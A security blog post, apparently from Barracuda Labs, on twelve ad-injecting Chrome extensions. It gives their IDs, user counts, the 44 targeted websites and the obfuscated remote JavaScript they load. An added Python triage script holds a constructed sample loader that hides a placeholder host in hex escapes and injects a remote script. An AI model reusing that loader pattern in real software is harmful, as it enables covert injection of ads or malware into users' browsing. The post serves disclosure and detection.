The Google Chrome web store has been in the spotlight recently for security risks that some of the tools are causing. Most recently, Google had to remove two Chrome extensions that could sneakily inject ads or malware on websites that would then infect unsuspecting users. There were more than 100,000 users who may have been infected before Google removed the two extensions.
At Barracuda Labs, we have monitored Chrome extension spam since October 2012, when we found several spamming extensions using Rovio's famous puzzle games as the hook to attract 82,000 users in a few days. In the last few weeks, we have detected another big spam campaign in the Chrome web store.
In summary, we found 12 Chrome extensions that inject advertisements into 44 popular websites and that have been installed by more than 180,000 Chrome users (see Table 1).
Table 1: Ad-injecting Chrome extensions still live as of Jan-30-2014

| Title | URL (extension ID) | Permissions required | Users 01-08 | Users 01-15 | Users 01-23 | Users 01-30 |
|---|---|---|---|---|---|---|
| logo quiz game | kmkacofigdhiobalbhnklkknlbplmjpj | Your data on all websites | 75257 | 77744 | 81158 | 81994 |
| counter strike cs portable | dkbaopnghjggmdcmcoaloenaalokmili | Your data on all websites | 25680 | 26538 | 27549 | 26999 |
| snail bob 2 | jdjpjalodncbfhaghlafopfckkchenoi | Your data on all websites, Your tabs and browsing activity | 14983 | 15015 | 15840 | 15851 |
| pac-man 80s | njgeoadngonelhmacgjigochdijoofgn | Your data on all websites, Your tabs and browsing activity | 12161 | 12652 | 13389 | 13415 |
| draw my thing | hdijmiefiogighmeaonofemaclnfplil | Your data on all websites | 11117 | 11354 | 11961 | 12198 |
| nyan cat fly | bphkilcpnjgeegfnmifeifcmkgjngknk | Your data on all websites, Your tabs and browsing activity | 9044 | 9305 | 9857 | 9794 |
| tetris flash | cfhhalmjbofkjcgefcaejjdicdddpkkk | Your data on all websites, Your tabs and browsing activity | 8284 | 8558 | 8798 | 8945 |
| bubble elements | fcijkonhppildbjgkdaglmeoeemcldha | Your data on all websites, Your tabs and browsing activity | 5126 | 5174 | 5413 | 5384 |
| angry halloween hd | emfeoamofdcdeeaicodpfofpfefibaee | Your data on all websites | 2100 | 2127 | 2229 | 2268 |
| smart soccer goalkeeper | dfcjfcgpnnnkcppamjpobglgefaoecia | Your data on all websites | 1904 | 1994 | 2089 | 2080 |
| pac-xon deluxe | gghdghpgjbaddlnfaopaildhlahpegmp | Your data on all websites, Your tabs and browsing activity | 1788 | 1896 | 1968 | 2024 |
| pong | pdiilpimpenppmfcgjhnjkoebelagipj | Your data on all websites, Your tabs and browsing activity | 360 | 404 | 393 | 410 |
| Total | | | 167,804 | 172,761 | 180,644 | 181,362 |
As last time, all of these extensions require the permission "Your data on all websites", so that ads can be injected into any website the user browses.
Meanwhile, all of these extensions are registered under the same developer organization: www.konplayer.com.
Figure 1: One of the ad-injecting extensions from www.konplayer.com, with 81,158 users
Unlike our last findings, the extension codebase does not contain the malicious JavaScript itself. Instead, the code only references a URL and the JavaScript is hosted on another domain, www.chromeadserver.com, a name that would trick unsuspecting users into thinking Google owns the domain, which it does not.
After downloading the JavaScript from that URL, we noticed that it starts with the jQuery library (a JavaScript library commonly used in website design), which looks entirely benign. Later in the file, however, obfuscated JavaScript begins, which is very suspicious.
Figure 3: Obfuscated JavaScript code adschrome.js served at chromeadserver.com
After decoding the hexadecimal-escaped ASCII characters and putting the pieces together, we obtained the following code and spent some time understanding it. It looks familiar.
Figure 4: Obfuscated JavaScript code adschrome.js
A careful reading of the decoded program shows that it is the code responsible for injecting ad banners at various positions on 44 popular websites. The list of these 44 websites follows:
Table 2: Websites into which the above Chrome extensions inject ads

| Website | Website |
|---|---|
| chrome.angrybirds.com | www.myhappygames.com |
| heikki.angrybirds.com | www.chromegamez.com |
| poppit.pogo.com | www.gamesvarious.com |
| chrome.monsterdashgame.com | msn.com |
| www.officewebgames.com | yahoo.com |
| game2player.com | youtube.com |
| www.flashgames101.com | www.negane.com |
| games4chrome.com | imdb.com |
| www.tarmogames.com | myspace.com |
| www.gamesgator.com | chrome.plantsvszombies.com |
| www.douchegames.com | bejeweled.popcap.com |
| higamecenter.com | evolvedonlinegames.com |
| chromegamebox.com | www.webstoregames.com |
| kizi.com | www.wardoom.com |
| home.sweetim.com | www.sasquatchsurvivor.com |
| www.juegos.com | www.realmofthemadgod.com |
| www.miniclip.com | gameboysite.com |
| naclgames.com | www.pinkemu.com |
| armorgames.com | www.silverstoregames.com |
| chrometopgames.com | disney.go.com |
| chrome.kingstonking.com | 2048gamers.com |
| captainwebstore.com | entanglement.gopherwoodstudios.com |
Meanwhile, we notice that this code was also used by the ad-injecting Chrome extensions disclosed in our last report. It is probably the same group of hackers, which has simply changed its name from www.playook.info to www.konplayer.com.
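As an added example (not Barracuda Labs' tooling), the Python script below applies the two signals from the analysis above to an unpacked extension: a manifest that asks for every website (the `<all_urls>` and `*://*/*` host patterns behind the "Your data on all websites" warning) and a content script that hides a remote script URL behind hex-escaped characters. The manifest and loader script are constructed samples; the extension name and the host `ads.example` are placeholders.

```python
import json
import re

# Host patterns that trigger the "Your data on all websites" warning.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Constructed sample manifest; the name and hosts are placeholders.
SAMPLE_MANIFEST = json.dumps({
    "name": "example puzzle game",
    "version": "1.0",
    "permissions": ["http://*/*", "https://*/*", "tabs"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["loader.js"]}],
})

# Constructed content script: a benign-looking jQuery-style prelude, then a
# hex-escaped string hiding "http://ads.example" that is used to load a script.
SAMPLE_LOADER = r"""/*! jQuery v1.x | MIT */ var $ = function () {};
var u = "\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x73\x2e\x65\x78\x61\x6d\x70\x6c\x65";
var s = document.createElement("script"); s.src = u + "/a.js";
document.head.appendChild(s);
"""


def broad_host_access(manifest_text):
    """Return the manifest entries that grant access to every website."""
    manifest = json.loads(manifest_text)
    found = [p for p in manifest.get("permissions", []) if p in BROAD_HOSTS]
    for script in manifest.get("content_scripts", []):
        found += [m for m in script.get("matches", []) if m in BROAD_HOSTS]
    return found


def decode_hex_escapes(js):
    """Turn every backslash-x-NN escape into the character it encodes."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), js)


def remote_hosts(js):
    """Hostnames of http(s) URLs that become visible once escapes are decoded."""
    decoded = decode_hex_escapes(js)
    return sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", decoded)))


def triage(manifest_text, js):
    """Combine both signals into one verdict dict for an extension."""
    hosts = remote_hosts(js)
    injects = re.search(r"createElement\(\s*['\"]script['\"]\s*\)", js) is not None
    return {"broad_host_access": broad_host_access(manifest_text),
            "remote_hosts": hosts,
            "loads_remote_script": injects and bool(hosts)}
```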
Google can certainly remove these spam extensions from the web store to protect future victims, but what if the group changes its name again, or relocates and tweaks the spam code? Until Google provides a sustainable solution, Chrome users have to protect themselves. As we have always advised, be very careful when installing Chrome extensions, even from the Google Chrome web store. Use common sense to judge whether an extension needs the permissions it requests; if any permission seems beyond what the extension should need, do not install it.
Once again, Google has failed to protect Chrome users by allowing these spam extensions on its shelves, which is certainly something users should consider when deciding which products to use.
Christine Barry is Senior Chief Blogger and Social Media Manager at Barracuda. In this role she helps bring Barracuda stories to life and facilitates communication between the public and Barracuda's internal teams. Before joining Barracuda, Christine worked for over 15 years as a field service technician and project manager for K12 and SMB customers. She holds several technology degrees, a Bachelor of Arts and a Master of Business Administration. She is a graduate of the University of Michigan.